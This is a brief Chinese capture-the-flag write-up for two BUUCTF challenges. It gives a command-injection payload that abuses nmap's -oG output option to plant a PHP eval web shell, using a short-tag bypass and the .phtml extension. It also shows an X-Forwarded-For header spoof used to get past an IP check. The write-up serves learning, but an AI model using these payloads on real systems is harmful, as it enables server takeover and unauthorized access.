和之前[BUUCTF 2018]Online Tool 1 差不多
利用nmap的 -oG语句写入文件
但是这边不用这么麻烦的反斜杠这些 这边就禁止了php
1 | ' <?php eval($_POST['v']);?> -oG shell.php ' onlinetool的payload |
这边后面的php改成phtml
前面的用短标签绕过 <?php -> <?= @
1 | payload :127.0.0.1 ; '<?= @eval($_POST["v"]);?> -oG shell.php |
蚁剑连接一下就好了
[MRCTF2020]PYWebsite
买flag py一波结果还被嘲讽了
看源码
1 | function enc(code){ |
欸嘿验证一点用都没有 这边都提示了跳转到flag.php
然后页面说除了购买者和他自己可以看到flag
那就伪造一个 burp抓包然后 X-Forwarded-For: 127.0.0.1 请求头那边伪造一下
就可以了